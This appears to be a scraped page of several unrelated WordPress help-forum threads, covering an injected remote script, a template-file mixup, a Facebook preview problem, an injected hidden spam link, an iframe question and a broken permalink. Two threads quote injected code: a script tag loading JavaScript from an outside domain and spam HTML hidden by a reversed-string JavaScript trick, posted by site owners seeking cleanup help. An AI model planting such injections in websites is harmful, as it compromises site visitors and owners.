I have created my website by myself. Recently, I found malicious code is appearing in my website as
" script type="text/javascript" src="http://12js.org/jquery.js">
Sometimes, this code is appeared in source code. Another time, it is disappeared. It is like a re-infection.
I cannot find this code & I need to solve this issue. Anyone here to help me??
I am suffering with this problem.
You need to search your theme and plugin code files.
Look for the below code WP function malicious code
Related
I just wrote a long and detailed question and when I was about to submit it, I fixed the problem by myself. The problem did cost me about 5 hours and now I will just post this little explanation, so maybe it helps others and they will not feel as stupid as I do right now.
In my defense: I do not have that much experience with this system.
What was the Problem? When did it show up?
Before I change a file on the server, I always duplicate it and change the file name to originalFileName_yyyymmdd_hhmm.php (filename + date + time). I want to keep track of the changes, and when we launch the website, I wanted to do a local backup and then delete them from the server.
Let's say, in the folder of the active theme there is a file called home.php.
It is a template file, which means that you can select it as a template for a page when editing it in the backend of WordPress.
I duplicated it and called the new file home_20180301_2300.php.
Then I edited the home.php, but the changes were not displayed on the website.
I checked for any known cache issue, but that was not the problem. So I installed a debugging plugin (Template Debugger) to see which files are used by the server to create the website.
Wordpress used the home_20180301_2300.php instead of the home.php and I did not know why. When I deleted home_20180301_2300.php WordPress did NOT use home.php It just took the standard template instead.
What I think what happened
In the last moment before submitting this question I realized what happened:
In the process of working, there was a situation where I deleted the home.php and then edited the page in the backend. WordPress could not find the home.php, which was set as the template for this page. BUT it found home_20180301_2300.php and used it. (Because WordPress is smart [sometimes {not a joke}]). When home.php was back in its place, WordPress did not care. It looks like as long as there is no problem, WordPress does not search for other (or newer, or better suiting) files. It still used home_20180301_2300.php, because it worked. That's why my changes in home.php did not have any effect. home.php was ignored.
The Solution
I had to delete home_20180301_2300.php, open the page in edit mode and select home.php as the template again. WordPress did not find home_20180301_2300.php, "BUT HEY! There is home.php, my old friend, so I can use it", WordPress said and they happily lived together for the rest of their time.
Feel free to comment!
I am sure my explanation is quite simple and not showing the whole picture. If anyone knows better, I would be glad to hear it. Better knowledge of the problem and the way WordPress works can help me and others to better understand future issues.
Peace out,
Nils
I tried everything but I can't find the problem.
I got this site http://www.ilsanoquotidiano.com and if I try to share to facebook a news, the og:image is always blank, but up to a month ago this works fine.
I tried with plugins or manually but the og:image is always blank even in facebook debugger but the raw tag is correct.
Could anyone help me?
Thanks
You can scrap the facebook sharing information via debugger. Link to check the result is given below:
https://developers.facebook.com/tools/debug/sharing/?q=http%3A%2F%2Fwww.ilsanoquotidiano.com%2F
Thanks for the reply, reading online I found that a problem could be the Jetpack version update, I tried to deactivate the plugin and after few hours everithing worked fine. I can't figure why happened this.
Only today that it came to my attention that there is a malicious link that was injected in my wordpress site.
The link is only on the homepage of orphicpixel.com and here is the full code in html
<div class="toggle-search"><div id="5221f63">Learn how to extend your penis size using vigrx reviews.</div><script type="text/javascript">document.getElementById("36f1225".split("").reverse().join("")).style.display
= "none"</script><i class="fa fa-search"></i></div>
This are the fix that I tried.
Change the theme to default - the code is still there.
Turn off all the plugins - the code is gone.
I have identified 5 plugins that when turned on, the code appears. But the plugins are the official plugins like Jetpack, WP-pagination etc.
I search already my database but I got nothing.
I downloaded the theme files and search the codes, nothing
I downloaded all the plugins file and search the codes, nothing
So my last resort is to post this question here.
Unfortunately it is likely hidden in something like an eval statement, which can be hidden in hex. Wordpress can be useful but the plugins are what make a security nightmare. It is likely that some plugin has allowed some kind of upload access to your site and they can run their own PHP script or anything really.
Look through your files using
find . -type f -mtime -1
The -1 is days back, you can try -2, -3 etc. If this is a recent problem hopefully this will show a recently modified file. It will look a lot like gibberish when you open a file that is bad.
Again unfortunately, if they are smart they will adjust the time on the file to be something a few weeks back or what ever, thus making the file much harder to find.
Did you purchase your WordPress theme yourself and from the original provider? I would download Theme Authenticity Checker and run the plugin -- it finds malicious code within the theme. I know you checked the theme files, but better be safe than sorry. Usually, purchased themes have no problem but downloaded ones often have malicious code such as this.
Okay Internet, got a doosy here.
Let me try to explain this the best I can.
I have a website, and on one of its page it has an iframe.
the link to this website is www.mywebsite.com/content.html
Here's what i need to do:
I need to create a link to www.mywebsite.com/content.html but change the source in the side the iframe. I've read some things on stackoverflow but they didn't help explain what i need to do.
Help?
I have one page that returns a 404 error and it is just mind boggling why this is happening. Please see this page: http://www.cra63.com/eventos/
It's the first link, 50 Aniversario 2013.
All other links work. But, not this one. Crazy. Is it a cache issue of some sort? I don't have a cache plugin installed, so I can't think of anything else.
When in the admin panel, the preview button loads the proper page with no problem. I have looked at the url 50 times and it seems to be correct.
Permalinks is set to /%post-name%/.
I'm not a novice although this apparently silly question makes me feel like I am.
Please help. Thanks!
Please duplicate page plus update URL accordingly (after you rename it).
You may enable WP_DEBUG - visit this codex article
One more idea, consider integrating an optimization plugin and run it often. A broken link checker is powerful too.
Ya neva know what the problem can be! Hopefully, it doesn't happen again...
NOTE - This was resolved by simply renaming the permalink from:
50-aniversario-2013
to ...
50th-aniversario-2013
When using a different name, aniversario-2013, it wasn't fixed. So, all I can suggest is to rename the url/permalink. But, this is definitely not a fix in my book. Call it a bug!